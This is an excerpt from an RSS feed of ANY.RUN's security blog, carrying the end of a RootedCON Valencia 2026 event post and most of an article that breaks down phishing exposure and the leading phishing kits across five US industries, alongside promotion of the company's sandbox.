<p class="wp-block-paragraph">That is the role interactive threat analysis can play for <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">SOCs</a> and <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSPs</a>. By giving analysts direct visibility into execution and the indicators it produces, ANY.RUN helps turn individual alerts into investigations with more context. </p>



<h2 class="wp-block-heading">From Rooted Valencia to the Next Investigation </h2>



<p class="wp-block-paragraph">Rooted Valencia brought together a wide range of perspectives on cybersecurity, from emerging AI-related risks to established techniques used in malware and intrusion campaigns. </p>



<p class="wp-block-paragraph">The combination of execution visibility, behavioral analysis, and threat intelligence gives analysts more than a simple malicious-or-benign verdict. It provides evidence they can examine, indicators they can investigate, and context they can use to understand a threat. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Increase threat detection by 36%</span> <br> and deliver stronger security outcomes for every client.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=rootedcon-valencia-2026&#038;utm_term=250926&#038;utm_content=linktomssp#contact-sales" rel="noopener" target="_blank">
Discover ANY.RUN for MSSPs</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">Thank you to everyone who visited the ANY.RUN booth, shared their experiences, and spoke with our team in Valencia. </p>



<p class="wp-block-paragraph">We look forward to continuing the conversation at the next event. </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> provides interactive malware analysis and threat intelligence to more than 16,000 organizations and 700,000 security professionals worldwide. </p>



<p class="wp-block-paragraph">The solutions include the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>, and <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>, helping <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">SOC</a> and <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSP</a> teams investigate suspicious files and URLs, uncover connections between threats, and gain more context during security investigations. </p>



<p class="wp-block-paragraph">ANY.RUN also maintains a strong focus on security and data protection. The company is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rootedcon-valencia-2026&amp;utm_term=250926&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II certified</a>, reflecting its commitment to robust security controls and the protection of customer information. </p>
<p>The post <a href="https://any.run/cybersecurity-blog/rootedcon-valencia-2026/">ANY.RUN at RootedCON Valencia 2026: Where Cybersecurity Meets the Next Wave of AI</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/rootedcon-valencia-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Phishing Risk Across 5 Key US Industries: ANY.RUN Data &amp; Mitigation Strategies</title>
		<link>https://any.run/cybersecurity-blog/phishing-risk-industries/</link>
					<comments>https://any.run/cybersecurity-blog/phishing-risk-industries/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 23 Sep 2026 10:31:58 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23298</guid>

					<description><![CDATA[<p>According to fresh ANY.RUN data, phishing exposure remains above 70% in several critical industries. This doesn’t happen because organizations aren’t protected enough. Companies have been implementing email filtering, MFA, and phishing-awareness training for years. However, threats continue to evolve, and security methods that were highly effective yesterday can develop visibility gaps as attackers adapt. In [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/phishing-risk-industries/">Phishing Risk Across 5 Key US Industries: ANY.RUN Data &amp; Mitigation Strategies</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">According to fresh <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> data, phishing exposure remains above 70% in several critical industries. This doesn’t happen because organizations aren’t protected enough. Companies have been implementing email filtering, MFA, and phishing-awareness training for years. </p>



<p class="wp-block-paragraph">However, threats continue to evolve, and security methods that were highly effective yesterday can develop visibility gaps as attackers adapt.  </p>



<p class="wp-block-paragraph">In this article, ANY.RUN explores data-driven insights to get to the bottom of phishing risk across key industries in the United States and examines how SOC teams can mitigate it. </p>



<p class="wp-block-paragraph">See <a href="https://any.run/cybersecurity-blog/phishing-us-finance/">our previous article</a> on phishing risk among US-based financial organizations.</p>



<h2 class="wp-block-heading">Key Executive Takeaways</h2>



<ul class="wp-block-list">
<li><strong>Phishing remains a cross-industry risk.</strong> Exposure is consistently high across critical US sectors, making it an organization-wide concern rather than an isolated email-security problem.</li>



<li><strong>Email is only the beginning of the attack chain.</strong> Archives, PDFs, links, redirects, and post-click activity create visibility gaps that email controls alone cannot cover.</li>



<li><strong>Phishing is increasingly targeting identity and access.</strong> AiTM, session theft, token abuse, and user-driven execution make attacks harder to detect and contain with traditional controls alone.</li>



<li><strong>Speed and visibility are critical to reducing exposure.</strong> Behavioral analysis helps SOC teams uncover evasive activity quickly and move from suspicious content to informed response faster.</li>
</ul>



<h2 class="wp-block-heading">Phishing Risk Remains High Across Critical Industries</h2>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-394"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="6"
           data-wpID="394"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Industry                    </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Key ANY.RUN Data                    </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Impacted Business Processes & Operational Risks                    </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Priority SOC Action                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Finance                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        73.4% phishing exposure; 58.7% of analyzed files are emails                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Credential theft, fraud, sensitive financial data exposure                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Strengthen email and post-click threat analysis                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Banking                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        ClickFix 71%, EtherHiding 63.8%, Sneaky2FA 62.3% prevalence                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Session hijacking, credential compromise, unauthorized access                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Detect AiTM, user-driven execution, and evasive activity                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Manufacturing                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        72.2% phishing exposure                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Business disruption, sensitive data and system compromise                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Detect and contain phishing chains before they progress                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Government & Administration                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        67.9% emails, 15.6% archives, 6.7% PDFs                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Credential theft and compromise through document-based lures                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D5"
                    data-col-index="3"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Analyze attachments, links, and post-click behavior                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Technology                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Tycoon, Sneaky2FA, EvilProxy, ClickFix, EvilTokens among top threats                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Credential, session, and access-token compromise                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D6"
                    data-col-index="3"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Prioritize identity-focused and post-click threat detection                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-394'>
table#wpdtSimpleTable-394{ table-layout: fixed !important; }
table#wpdtSimpleTable-394 td, table.wpdtSimpleTable394 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">Across finance, banking, technology, manufacturing, and government <a href="https://any.run/cybersecurity-blog/csuite-attack-analysis/"><strong>phishing</strong></a> exposure reaches <strong>69.9%</strong>, showing that phishing remains a widespread risk across critical sectors. The highest exposure levels appear in <strong><a href="https://any.run/by-industry/finance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktofinance">finance</a></strong> at <strong>73.4%</strong> and <strong><a href="https://any.run/by-industry/manufacturing/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktomanufacturing">manufacturing</a></strong> at <strong>72.2%</strong>.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="538" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Phishing-Exposure-Stays-Above-70-1024x538.png" alt="" class="wp-image-23322" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Phishing-Exposure-Stays-Above-70-1024x538.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Phishing-Exposure-Stays-Above-70-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Phishing-Exposure-Stays-Above-70-768x403.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Phishing-Exposure-Stays-Above-70-1536x806.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Phishing-Exposure-Stays-Above-70-2048x1075.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Phishing-Exposure-Stays-Above-70-370x194.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Phishing-Exposure-Stays-Above-70-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Phishing-Exposure-Stays-Above-70-740x389.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Phishing exposure statistics based on ANY.RUN submissions data, 2026</figcaption></figure>



<p class="wp-block-paragraph">At this level of exposure, phishing is no longer just an email security concern. It is an organization-wide risk that requires consistent visibility, detection, and response.</p>



<p class="wp-block-paragraph">Part of the reason behind those concerning numbers lies in how quickly threat actors evolve and adapt their techniques. AI makes convincing social engineering easier to scale, while techniques such as AiTM phishing and session theft make identity compromise increasingly difficult to prevent.</p>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/h1-2026-cyber-risk-report/" target="_blank" rel="noreferrer noopener">Explore broader threat landscape with H1 2026 Cyber Risk Report</a> </p>



<p class="wp-block-paragraph">Phishing campaigns increasingly combine sophisticated social engineering with identity-focused techniques, legitimate services, and evasive delivery methods. </p>



<p class="wp-block-paragraph">The types of submissions most frequently analyzed in ANY.RUN’s Interactive Sandbox also show that email security alone cannot cover the entire attack surface. Across all five industries analyzed (finance, banking, technology, manufacturing, and government &amp; administration), email messages account for <strong>54.4% </strong>of submissions, followed by archives at <strong>19.7% </strong>and PDFs at <strong>9%</strong>.</p>



<p class="wp-block-paragraph">For security leaders, this highlights the need to extend visibility beyond the email gateway. Email remains central, while the attack surface extends further into the files, links, and other content delivered through it. Effective phishing defense therefore requires visibility into what happens after delivery, including how suspicious content behaves once opened or executed.</p>



<p class="wp-block-paragraph">The same pattern is even more pronounced in individual sectors. Finance and government &amp; administration, for example, show particularly high shares of email-based submissions:</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="538" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Email-Remains-a-Major-Attack-Vector-1024x538.png" alt="" class="wp-image-23320" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Email-Remains-a-Major-Attack-Vector-1024x538.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Email-Remains-a-Major-Attack-Vector-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Email-Remains-a-Major-Attack-Vector-768x403.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Email-Remains-a-Major-Attack-Vector-1536x806.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Email-Remains-a-Major-Attack-Vector-2048x1075.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Email-Remains-a-Major-Attack-Vector-370x194.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Email-Remains-a-Major-Attack-Vector-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Email-Remains-a-Major-Attack-Vector-740x389.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Based on ANY.RUN submissions data, 2026</figcaption></figure>



<p class="wp-block-paragraph">And it’s hard to blame users alone. Threat actors have become skilled at mimicking legitimate and niche documents, hiding payloads inside encrypted archives, and using techniques such as QR-code phishing to make malicious content harder to recognize at a glance. </p>



<p class="wp-block-paragraph">Without enhanced visibility, modern phishing attacks can be difficult to unravel even for experienced security teams. Analysts need to see beyond the initial email or file and understand what happens after a user opens a document, follows a link, or interacts with a malicious page. </p>



<h2 class="wp-block-heading">The Bigger Challenge: Phishing Is Becoming an Identity Attack </h2>



<p class="wp-block-paragraph">A deeper look at threats targeting critical sectors shows just how much the nature of phishing has changed. Email filtering, awareness training, and MFA can address parts of the phishing attack surface, but they cannot provide complete coverage against rapidly changing techniques.</p>



<p class="wp-block-paragraph">Across all five industries analyzed, the leading threats by volume share are:</p>



<ol start="1" class="wp-block-list">
<li><strong><a href="https://any.run/malware-trends/tycoon/">Tycoon</a></strong> — <strong>15%</strong></li>



<li><strong><a href="https://any.run/malware-trends/sneaky2fa/">Sneaky2FA</a></strong> — <strong>13.4%</strong></li>



<li><strong><a href="https://any.run/malware-trends/clickfix/">ClickFix</a></strong> — <strong>10.4%</strong></li>



<li><strong><a href="https://any.run/malware-trends/evilproxy/">EvilProxy</a></strong> — <strong>9.8%</strong></li>



<li><strong><a href="https://any.run/malware-trends/eviltokens/">EvilTokens</a></strong> — <strong>6.5%</strong></li>
</ol>



<p class="wp-block-paragraph">Together, these threats illustrate a broader shift: phishing no longer ends with detecting a malicious attachment. Leading threats increasingly involve <strong>credential theft, authentication session compromise, token abuse, and user-driven execution</strong>, expanding the attack surface beyond what traditional email security alone can see.</p>



<p class="wp-block-paragraph">Tycoon and EvilProxy use AiTM phishing techniques to capture credentials and authentication data, while EvilTokens targets access tokens and authenticated sessions. Instead of simply trying to deliver malware, these attacks increasingly target the identities and access that organizations rely on.</p>



<p class="wp-block-paragraph">PhaaS makes sophisticated phishing techniques easier to deploy at scale. AI makes lures more convincing and easier to personalize. AiTM and token theft demonstrate that protecting passwords alone may not be enough to prevent compromise.</p>



<details class="wp-block-details is-layout-flow wp-block-details-is-layout-flow"><summary><strong>More on ClickFix</strong></summary>
<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/click-fix-attacks-eric-parker-analysis/" target="_blank" rel="noreferrer noopener"><em>ClickFix</em></a><em> campaigns use fake errors, CAPTCHAs, or verification prompts to manipulate users into copying and executing malicious commands themselves. This allows attackers to turn social engineering into direct execution on the victim’s device.</em> <a href="https://any.run/malware-trends/clickfix/" target="_blank" rel="noreferrer noopener">Read more on Malware Trends Tracker</a></p>
</details>



<p class="wp-block-paragraph"></p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="499" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image8.png-1024x499.webp" alt="" class="wp-image-23328" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image8.png-1024x499.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image8.png-300x146.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image8.png-768x375.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image8.png-1536x749.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image8.png-370x180.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image8.png-270x132.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image8.png-740x361.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image8.png.webp 1782w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>A typical ClickFix “CAPTCHA” making user run a malicious command</em>. ANY.RUN Sandbox analysis</figcaption></figure>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph"></p>



<details class="wp-block-details is-layout-flow wp-block-details-is-layout-flow"><summary><strong>More on Sneaky2FA</strong></summary>
<p class="wp-block-paragraph"><em>Sneaky2FA – a phishing-as-a-service (PhaaS) kit designed to steal credentials and authentication sessions through adversary-in-the-middle (AiTM) techniques. </em><a href="https://any.run/malware-trends/sneaky2fa/" target="_blank" rel="noreferrer noopener"><em>Read more on Malware Trends Tracker</em></a> </p>
</details>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph">All terms aside, what this means is that modern phishing chains can: </p>



<ul class="wp-block-list">
<li>manipulate users into executing commands </li>
</ul>



<ul class="wp-block-list">
<li>intercept authentication sessions </li>
</ul>



<ul class="wp-block-list">
<li>steal credentials or tokens </li>
</ul>



<ul class="wp-block-list">
<li>abuse legitimate infrastructure </li>
</ul>



<p class="wp-block-paragraph">On top of that, attackers increasingly abuse trusted, legitimate services and infrastructure, making malicious activity harder for both users and traditional security controls to recognize.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Close the visibility gaps modern phishing exploits. <br>
Reveal <span class="highlight">hidden attack behavior</span> with ANY.RUN.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=phishing-risk-industries&#038;utm_term=230926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Explore for Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">All of this points to a major security gap: visibility. Blocking the original email is only one layer of defense. Your SOC needs more. </p>



<h2 class="wp-block-heading">Mitigation: Gain Visibility Before Phishing Turns Into a Breach </h2>



<p class="wp-block-paragraph">Modern phishing attacks are built to evade static controls, abuse legitimate services, and hide malicious behavior behind user interaction. It takes enhanced threats visibility both into the wider threat landscape and malicious activity happening inside specific campaigns. </p>



<p class="wp-block-paragraph">This is where behavioral analysis and threat intelligence can give defenders the upper hand. </p>



<h3 class="wp-block-heading">Expose the Full Attack Chain in Seconds </h3>



<p class="wp-block-paragraph">Instead of relying only on the initial email, URL, or file, analysts can safely detonate suspicious content in <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a> and observe the attack as it unfolds. With its capabilities, SOC analysts gain an <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">additional layer of visibility</a> into malware and phishing behavior. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1987" height="1073" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source.png" alt="" class="wp-image-23237" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source.png 1987w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-300x162.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-1024x553.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-768x415.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-1536x829.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-370x200.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-270x146.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/html-lure-source-740x400.png 740w" sizes="auto, (max-width: 1987px) 100vw, 1987px" /><figcaption class="wp-element-caption">The JavaScript file import inside PDF Viewer. Investigation within ANY.RUN Sandbox </figcaption></figure>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/automated-interactivity-stage-two/" target="_blank" rel="noreferrer noopener">Automated Interactivity</a> performs the actions needed to expose evasive behavior without repetitive manual effort, helping analysts investigate threats involving password-protected archives, CAPTCHAs, malicious QR codes, and other interactive attack chains. In-browser data inspection provides deeper visibility into browser activity, redirects, scripts, requests, and other artifacts involved in the attack. </p>



<p class="wp-block-paragraph">Most importantly, all of this takes just seconds. </p>



<p class="wp-block-paragraph">Average MTTD with ANY.RUN is just <strong>14</strong> seconds, with similarly fast detection across the critical industries:<strong> 16.3 sec</strong> for banking and <strong>17 sec </strong>for <a href="https://any.run/by-industry/technology/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries&amp;utm_term=230926&amp;utm_content=linktotechnology" target="_blank" rel="noreferrer noopener">technology</a>.</p>



<p class="wp-block-paragraph">The result is a much clearer and faster path from alert to response: </p>



<p class="wp-block-paragraph"><em>Suspicious email → Detonate safely → Reveal behavior → Identify the threat → Respond </em></p>



<p class="wp-block-paragraph">Full-scale visibility into threat behavior, including evasive phishing, helps streamline daily SOC workflows and accelerate response before threats can progress further. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn threat visibility into faster response. <br>
Achieve <span class="highlight">14-second</span> average MTTD with ANY.RUN. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries&amp;utm_term=230926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Explore for Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">For SOC teams, this means: </p>



<ul class="wp-block-list">
<li><strong>Faster threat detection:</strong> identify malicious behavior in seconds. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Less manual investigation: </strong>automate repetitive interactions and analysis steps. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Greater visibility: </strong>expose redirects, scripts, network activity, and complete attack chains. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Faster response: </strong>move from suspicious artifact to informed action sooner. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Reduced risk exposure:</strong> contain threats before they can progress across the infrastructure. </li>
</ul>



<ul class="wp-block-list">
